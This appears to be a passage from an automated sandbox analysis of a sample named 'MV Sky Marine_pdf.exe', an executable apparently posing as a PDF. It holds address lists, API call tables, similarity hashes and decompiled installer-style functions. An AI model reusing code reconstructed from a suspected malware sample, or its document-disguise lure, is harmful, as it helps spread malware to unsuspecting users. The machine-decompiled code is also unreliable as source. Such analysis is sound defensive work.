                                                                                                  0x00404ad3
                                                                                                  0x00404ad6
                                                                                                  0x00404ad6
                                                                                                  0x00404adc
                                                                                                  0x00404ae2
                                                                                                  0x00404ae5
                                                                                                  0x00404aeb
                                                                                                  0x00404aec
                                                                                                  0x00404af1
                                                                                                  0x00404afa
                                                                                                  0x00404b01
                                                                                                  0x00404b04
                                                                                                  0x00404b07
                                                                                                  0x00404b0a
                                                                                                  0x00404b46
                                                                                                  0x00404b6f
                                                                                                  0x00404b48
                                                                                                  0x00404b55
                                                                                                  0x00404b55
                                                                                                  0x00404b0c
                                                                                                  0x00404b0f
                                                                                                  0x00404b1e
                                                                                                  0x00404b28
                                                                                                  0x00404b30
                                                                                                  0x00404b37
                                                                                                  0x00404b3f
                                                                                                  0x00404b3f
                                                                                                  0x00404b0a
                                                                                                  0x00404b75
                                                                                                  0x00404b76
                                                                                                  0x00404b82
                                                                                                  0x00404b82
                                                                                                  0x00404b8f
                                                                                                  0x00404baa
                                                                                                  0x00404bae
                                                                                                  0x00404bcb
                                                                                                  0x00404bd0
                                                                                                  0x00404bd3
                                                                                                  0x00000000
                                                                                                  0x00404bb0
                                                                                                  0x00404bb5
                                                                                                  0x00404bbe
                                                                                                  0x00404f4b
                                                                                                  0x00404f5d
                                                                                                  0x00404f5d
                                                                                                  0x00404bae
                                                                                                  0x00000000
                                                                                                  0x00404b8f
                                                                                                  0x00404ac7

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 00404976
                                                                                                  • GetDlgItem.USER32 ref: 00404983
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049CF
                                                                                                  • LoadBitmapA.USER32 ref: 004049E2
                                                                                                  • SetWindowLongA.USER32 ref: 004049FC
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A10
                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A24
                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404A39
                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A45
                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A57
                                                                                                  • DeleteObject.GDI32(?), ref: 00404A5C
                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A87
                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A93
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B28
                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B53
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B67
                                                                                                  • GetWindowLongA.USER32 ref: 00404B96
                                                                                                  • SetWindowLongA.USER32 ref: 00404BA4
                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BB5
                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CB8
                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D1D
                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D32
                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D56
                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D7C
                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D91
                                                                                                  • GlobalFree.KERNEL32 ref: 00404DA1
                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E11
                                                                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404EBA
                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EC9
                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EE9
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F37
                                                                                                  • GetDlgItem.USER32 ref: 00404F42
                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F49
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                  • String ID: $M$N
                                                                                                  • API String ID: 1638840714-813528018
                                                                                                  • Opcode ID: be7540e4cc6a151ea8713d31a9eed4cf9da7dc34b27a5e75a40caa79e02f15b3
                                                                                                  • Instruction ID: b39e9636f5aaab15ba5d0f8970ea7500dddba046e98d1044c397c9b2f2ac7f8d
                                                                                                  • Opcode Fuzzy Hash: be7540e4cc6a151ea8713d31a9eed4cf9da7dc34b27a5e75a40caa79e02f15b3
                                                                                                  • Instruction Fuzzy Hash: 74028CB0900209AFEB11CF55DC85AAE7BB5FB84314F10817AF611BA2E1D7799E42CF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040441E, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 273stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 78%
                                                                                                  			E0040441E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x79e570;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x7a3000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004055C9(0x3fb, _t146);
					E00405F86(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004055C9(0x3fb, _t146);
							if(E004058F8(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405D24(0x79dd68, _t146);
							_t87 = E004060B4(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405D24(0x79dd68, _t146);
								_t89 = E004058AB(0x79dd68);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x79dd68,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79dd68) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79dd68,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E0040585E(0x79dd68) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x79dd68) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E004048B2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x7a1f7c; // 0x891203
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040489A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x79dd58);
									} else {
										E004047D5(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a2844 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00404002(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x79ed8c == _t158) {
									E004043B3();
								}
								 *0x79ed8c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x79eda0;
							_v60 = E0040476F;
							_v56 = _t146;
							_v68 = E00405D46(_t146, 0x79eda0, _t166, 0x79e170, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405817(_t146);
								_t125 =  *((intOrPtr*)( *0x7a27b0 + 0x11c));
								if( *((intOrPtr*)( *0x7a27b0 + 0x11c)) != 0 && _t146 == 0x7a8400) {
									E00405D46(_t146, 0x79eda0, _t166, 0, _t125);
									if(lstrcmpiA(0x7a1740, 0x79eda0) != 0) {
										lstrcatA(_t146, 0x7a1740);
									}
								}
								 *0x79ed8c =  *0x79ed8c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405884(_t146) != 0 && E004058AB(_t146) == 0) {
						E00405817(_t146);
					}
					 *0x7a1f78 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FE0(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FE0(_t166);
					E00404015(_t165);
					_t138 = E004060B4(0xa);
					if(_t138 == 0) {
						L53:
						return E00404047(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}













































                                                                                                  0x0040441e
                                                                                                  0x00404424
                                                                                                  0x0040442a
                                                                                                  0x00404437
                                                                                                  0x00404445
                                                                                                  0x00404448
                                                                                                  0x00404450
                                                                                                  0x00404456
                                                                                                  0x00404456
                                                                                                  0x00404462
                                                                                                  0x00404465
                                                                                                  0x004044d3
                                                                                                  0x004044da
                                                                                                  0x004045b1
                                                                                                  0x004045b8
                                                                                                  0x004045c7
                                                                                                  0x004045c7
                                                                                                  0x004045cb
                                                                                                  0x004045d5
                                                                                                  0x004045e2
                                                                                                  0x004045e4
                                                                                                  0x004045e4
                                                                                                  0x004045f2
                                                                                                  0x004045f9
                                                                                                  0x00404600
                                                                                                  0x00404603
                                                                                                  0x0040463a
                                                                                                  0x0040463c
                                                                                                  0x00404642
                                                                                                  0x00404647
                                                                                                  0x0040464b
                                                                                                  0x0040464d
                                                                                                  0x0040464d
                                                                                                  0x00404669
                                                                                                  0x00000000
                                                                                                  0x0040466b
                                                                                                  0x0040466e
                                                                                                  0x0040467c
                                                                                                  0x00404682
                                                                                                  0x00404683
                                                                                                  0x00404686
                                                                                                  0x00404689
                                                                                                  0x00000000
                                                                                                  0x00404689
                                                                                                  0x00404605
                                                                                                  0x00404607
                                                                                                  0x0040460b
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040460d
                                                                                                  0x0040460d
                                                                                                  0x0040461a
                                                                                                  0x0040461f
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404623
                                                                                                  0x00404625
                                                                                                  0x00404625
                                                                                                  0x00404630
                                                                                                  0x00404633
                                                                                                  0x00404638
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404638
                                                                                                  0x00404695
                                                                                                  0x0040469f
                                                                                                  0x004046a2
                                                                                                  0x004046a5
                                                                                                  0x004046ac
                                                                                                  0x004046ac
                                                                                                  0x004046ae
                                                                                                  0x004046ae
                                                                                                  0x004046b3
                                                                                                  0x004046b5
                                                                                                  0x004046bd
                                                                                                  0x004046c4
                                                                                                  0x004046c6
                                                                                                  0x004046d1
                                                                                                  0x004046d1
                                                                                                  0x004046c6
                                                                                                  0x004046d8
                                                                                                  0x004046e1
                                                                                                  0x004046eb
                                                                                                  0x004046f3
                                                                                                  0x0040470e
                                                                                                  0x004046f5
                                                                                                  0x004046fe
                                                                                                  0x004046fe
                                                                                                  0x004046f3
                                                                                                  0x00404713
                                                                                                  0x00404718
                                                                                                  0x0040471d
                                                                                                  0x00404726
                                                                                                  0x00404726
                                                                                                  0x0040472f
                                                                                                  0x00404731
                                                                                                  0x00404731
                                                                                                  0x0040473d
                                                                                                  0x00404745
                                                                                                  0x0040474f
                                                                                                  0x0040474f
                                                                                                  0x00404754
                                                                                                  0x00000000
                                                                                                  0x00404754
                                                                                                  0x00404603
                                                                                                  0x004045ba
                                                                                                  0x004045c1
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004045c1
                                                                                                  0x004044e0
                                                                                                  0x004044e9
                                                                                                  0x00404503
                                                                                                  0x00404508
                                                                                                  0x00404512
                                                                                                  0x00404519
                                                                                                  0x00404525
                                                                                                  0x00404528
                                                                                                  0x0040452b
                                                                                                  0x00404532
                                                                                                  0x0040453a
                                                                                                  0x0040453d
                                                                                                  0x00404541
                                                                                                  0x00404548
                                                                                                  0x00404550
                                                                                                  0x004045aa
                                                                                                  0x00404552
                                                                                                  0x00404553
                                                                                                  0x0040455a
                                                                                                  0x00404564
                                                                                                  0x0040456c
                                                                                                  0x00404579
                                                                                                  0x0040458d
                                                                                                  0x00404591
                                                                                                  0x00404591
                                                                                                  0x0040458d
                                                                                                  0x00404596
                                                                                                  0x004045a3
                                                                                                  0x004045a3
                                                                                                  0x00404550
                                                                                                  0x00000000
                                                                                                  0x00404508
                                                                                                  0x004044f6
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004044fc
                                                                                                  0x00000000
                                                                                                  0x00404467
                                                                                                  0x00404474
                                                                                                  0x0040447d
                                                                                                  0x0040448a
                                                                                                  0x0040448a
                                                                                                  0x00404491
                                                                                                  0x00404497
                                                                                                  0x004044a0
                                                                                                  0x004044a3
                                                                                                  0x004044a6
                                                                                                  0x004044ae
                                                                                                  0x004044b1
                                                                                                  0x004044b4
                                                                                                  0x004044ba
                                                                                                  0x004044c1
                                                                                                  0x004044c8
                                                                                                  0x0040475a
                                                                                                  0x0040476c
                                                                                                  0x004044ce
                                                                                                  0x004044d1
                                                                                                  0x00000000
                                                                                                  0x004044d1
                                                                                                  0x004044c8

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 0040446D
                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404497
                                                                                                  • SHBrowseForFolderA.SHELL32(?,0079E170,?), ref: 00404548
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404553
                                                                                                  • lstrcmpiA.KERNEL32(HfkcdoekxlzOjbt,0079EDA0,00000000,?,?), ref: 00404585
                                                                                                  • lstrcatA.KERNEL32(?,HfkcdoekxlzOjbt), ref: 00404591
                                                                                                  • SetDlgItemTextA.USER32 ref: 004045A3
                                                                                                    • Part of subcall function 004055C9: GetDlgItemTextA.USER32 ref: 004055DC
                                                                                                    • Part of subcall function 00405F86: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FDE
                                                                                                    • Part of subcall function 00405F86: CharNextA.USER32(?,?,?,00000000), ref: 00405FEB
                                                                                                    • Part of subcall function 00405F86: CharNextA.USER32(?,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FF0
                                                                                                    • Part of subcall function 00405F86: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00406000
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(0079DD68,?,?,0000040F,?,0079DD68,0079DD68,?,00000001,0079DD68,?,?,000003FB,?), ref: 00404661
                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040467C
                                                                                                    • Part of subcall function 004047D5: lstrlenA.KERNEL32(0079EDA0,0079EDA0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046F0,000000DF,00000000,00000400,?), ref: 00404873
                                                                                                    • Part of subcall function 004047D5: wsprintfA.USER32 ref: 0040487B
                                                                                                    • Part of subcall function 004047D5: SetDlgItemTextA.USER32 ref: 0040488E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: A$HfkcdoekxlzOjbt
                                                                                                  • API String ID: 2624150263-3645444431
                                                                                                  • Opcode ID: a35848822b66a5b72b566826822699703d6d74f2a6479d0dc0bae6a048424868
                                                                                                  • Instruction ID: 2eb8aaa2efd78124c2d111ac58df3133dc9bbfb09b7a0f1b1767b6d074ea69be
                                                                                                  • Opcode Fuzzy Hash: a35848822b66a5b72b566826822699703d6d74f2a6479d0dc0bae6a048424868
                                                                                                  • Instruction Fuzzy Hash: 05A15DB1900609ABDB11AFA5CC45AAF77B8EF85314F10843BF711B62D1D77C8A418F69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402053, Relevance: 3.1, APIs: 2, Instructions: 134comCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 74%
                                                                                                  			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405884(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, 0x7a8800);
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409428, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409428, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                  0x0040205c
                                                                                                  0x00402066
                                                                                                  0x0040206f
                                                                                                  0x00402079
                                                                                                  0x00402082
                                                                                                  0x0040208c
                                                                                                  0x00402090
                                                                                                  0x00402090
                                                                                                  0x00402095
                                                                                                  0x004020a6
                                                                                                  0x004020ae
                                                                                                  0x0040218e
                                                                                                  0x0040218e
                                                                                                  0x00402195
                                                                                                  0x004020b4
                                                                                                  0x004020b4
                                                                                                  0x004020c5
                                                                                                  0x004020c9
                                                                                                  0x004020cf
                                                                                                  0x004020d9
                                                                                                  0x004020db
                                                                                                  0x004020e6
                                                                                                  0x004020e9
                                                                                                  0x004020f6
                                                                                                  0x004020f8
                                                                                                  0x004020fa
                                                                                                  0x00402101
                                                                                                  0x00402104
                                                                                                  0x00402104
                                                                                                  0x00402107
                                                                                                  0x00402111
                                                                                                  0x00402119
                                                                                                  0x0040211e
                                                                                                  0x0040212a
                                                                                                  0x0040212a
                                                                                                  0x0040212d
                                                                                                  0x00402136
                                                                                                  0x00402139
                                                                                                  0x00402142
                                                                                                  0x00402147
                                                                                                  0x00402159
                                                                                                  0x00402168
                                                                                                  0x0040216a
                                                                                                  0x00402176
                                                                                                  0x00402176
                                                                                                  0x00402168
                                                                                                  0x00402178
                                                                                                  0x0040217e
                                                                                                  0x0040217e
                                                                                                  0x00402181
                                                                                                  0x00402187
                                                                                                  0x0040218c
                                                                                                  0x004021a1
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040218c
                                                                                                  0x00402197
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409428,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 123533781-0
                                                                                                  • Opcode ID: 6c085ce4173e472293b98a60e83fc08fb9dfcdb600c22de38a5f30155ad76b43
                                                                                                  • Instruction ID: 404e50bc5d71950e3e8af582092634c837c43b9f218531fc8d83bde72b32b076
                                                                                                  • Opcode Fuzzy Hash: 6c085ce4173e472293b98a60e83fc08fb9dfcdb600c22de38a5f30155ad76b43
                                                                                                  • Instruction Fuzzy Hash: 83416D75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169FA05EB2D1CA799C41CB94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 39%
                                                                                                  			E00402671(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405C82(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405D24();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                  0x00402689
                                                                                                  0x0040269d
                                                                                                  0x004026a8
                                                                                                  0x004026a9
                                                                                                  0x004027e4
                                                                                                  0x0040268b
                                                                                                  0x0040268b
                                                                                                  0x0040268d
                                                                                                  0x0040268f
                                                                                                  0x0040268f
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
